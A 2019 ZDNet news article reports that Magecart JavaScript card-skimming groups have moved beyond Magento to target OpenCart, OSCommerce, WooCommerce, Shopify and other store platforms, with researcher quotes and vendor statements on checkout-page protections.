Tech

JavaScript card sniffing attacks spread to other e-commerce platforms

OpenCart, OSCommerce, WooCommerce, Shopify are also being targeted.

Written by Catalin Cimpanu, Contributor May 2, 2019 at 5:33 a.m. PT

Cybercriminal groups engaging in JavaScript card sniffing attacks --also referred to as Magecart attacks-- have slowly spread their operations to target additional platforms besides the Magento-based stores they initially went after when these types of attacks started, in 2015-2016.

See als

10 dangerous app vulnerabilities to watch out for (free PDF)

Nowadays, new research shows that all online shopping platforms are targets and need to be monitored against possible compromises of their checkout process, during which hackers might attempt to log and steal payment card data entered in checkout and payment forms.

For example, a report published today by threat intelligence firm RiskIQ details ongoing Magecart attacks against OpenCart and OSCommerce sites, two lesser-known online store solutions.

"Reading through the OpenCart as well as the OsCommerce forums, we can find multiple instances where administrators were able to figure out they were breached," the company said.

These infections turned out to be coordinated attacks carried out by what RiskIQ is tracking as Magecart Group 12, which specifically targeted the OpenCart platform.

But other platforms have also been targeted. A report published by Group-IB last month also highlighted ongoing attacks against Shopify and (WordPress) WooCommerce-based stores as well.

Sanguine Security's Willem de Groot also described Magecart attacks specifically targeting WooCommerce platforms last August, in an interview with ThreatPost.

From Magento to ...everything else

As it is becoming increasingly obvious, JavaScript sniffers, once considered a threat for Magento, are now a danger to all online store platforms, may them be self-hosted solutions or cloud-based commercial SaaS platforms.

"Organizations need to understand that skimming groups can prey on any web environment and we see every online shopping platform targeted in our telemetry data," Yonathan Klijnsma, RiskIQ Threat Researcher, said in a report released today.

And it all makes sense. JavaScript card sniffing refers to loading a malicious script on pages that deal with checkout operations, with the malicious script secretly recording a user's payment card details and sending data to a remote server.

The first groups which engaged in these types of attacks used vulnerabilities in the Magento e-commerce platform because at the time, Magento was the most widely used solution, and a perfect attack surface.

But today's e-commerce store scene is a lot more diverse, with many other e-commerce platforms available to interested store owners.

Furthermore, the number of Magecart hacking groups has also increased, pushing competing gangs towards other platforms in search of new victims.

JavaScript card sniffers becoming technology agnostic

While the RiskIQ report released today highlights a series of attacks targeting OpenCart-based stores, Magecart groups don't see themselves as limited to just Magento, WooCommerce, OpenCart, or OSCommerce platforms.

These groups will exploit any vulnerabilities they can and will hack into any website that runs a checkout page. Recent JavaScript card sniffer scripts discovered by RiskIQ, Group-IB, and other firms, appear to be designed to be technology agnostic, and over the past few months, they have been expanded to include support for stealing card data from an increasingly wider variety of checkout page formats and payment gateways.

Just earlier this week, Sanguine Security discovered one of these multi-functional scripts that had been coded to collect data from 57 different payment systems, showing how the JavaScript card sniffer scene has evolved from a past where it focused on the narrow internet strip of Magento stores, to a current state where any online store, regardless of the underlying technology or payment gateway, can be attacked.

As RiskIQ mentioned in a report last year, these groups aren't just exploiting Magento vulnerabilities anymore. Some of them, such as threat actors tracked as Magecart group #4, #5, #6, or #12, have evolved from targeting the stores themselves, to targeting their supply-chains (widgets, plugins, or analytics providers used by the stores).

Commercial cloud-based platforms are also at risk

This recent trend of focusing on compromising supply-chain providers also allows these groups to infect a wide variety of platforms, ranging from self-hosted stores to cloud-based platforms such as the ones provided by Magento, Shopify, Wix, Squarespace, X-Cart, OpenCart, and the plethora of other commercially-sold online store solutions.

Security

Last fall, when Magecart was the hot topic on everybody's lips in the infosec community, ZDNet reached out to several providers of cloud-based online store systems and inquired about the security systems they have in place to prevent JavaScript card sniffers from infecting their fleet of online stores and stealing customers' data.

Of the seven platforms we reached out to, only two responded --namely BigCommerce and Shopify.

Of the two, Shopify had probably the best security measure in place, as the platform does not allow "customizations for credit card collection and processing such as the inclusion of third-party JavaScript."

This means that neither users nor attackers can tinker with Shopify's payment card entry and processing scripts in any way unless they compromised Shopify itself.

Similarly, BigCommerce also deploys an array of cyber-security protections "including perimeter and server-specific firewalls, web application firewalls, file integrity monitors, intrusion detection systems, sitewide HTTPS, 24/7 human monitoring and routine penetration testing conducted by PCI-certified information security service providers," Scott Baker, vice president of IT, security and technical operations at BigCommerce, told ZDNet last year in a two-page document detailing the company's security practices.

"Though the BigCommerce APIs allow programmatic changes to the scripts included on a BigCommerce store, the checkout page - where these APIs are most commonly in use - includes extra protections that require additional scopes. These scopes can only be listed in our marketplace by PCI-compliant companies, and must be requested by the third-party application at installation. Furthermore, BigCommerce requires that an explicit agreement be signed before the merchant can manually change their checkout scripts," Baker also added.

Companies like Wix, OpenCart Cloud, Magento, and X-Cart did not return a request for comment. Squarespace did not want to comment.

JS skimming profits on par with ATM skimming

With the price of payment card details obtained from online stores is equalizing with the ones obtained from ATM skimming, attacks on online stores are expected to go on and even grow in intensity.

Prices for CP and CNP card data — Prices for CP (Card Present) and CNP (Card Not Present) card data. Card data obtained from online stores fits in the CNP category.
Image: Gemini Advisory, via KrebsOnSecurity

Furthermore, RiskIQ also sees Magecart groups expanding operations from JS card skimming to collecting additional details, such as login credentials, which can be sold online, as a secondary revenue stream.

"Skimming attacks on any platform is a critical issue because while payment data is currently the focus, we're already seeing moves to skim login credentials and other sensitive information," RiskIQ's Klijnsma also added.

"This widens the scope of potential Magecart victims far beyond e-commerce alone," the expert said, by allowing Magecart groups to weaponize and monetize JS sniffing code that accidentally and inadvertently lands on websites that don't include a shopping experience, to begin with.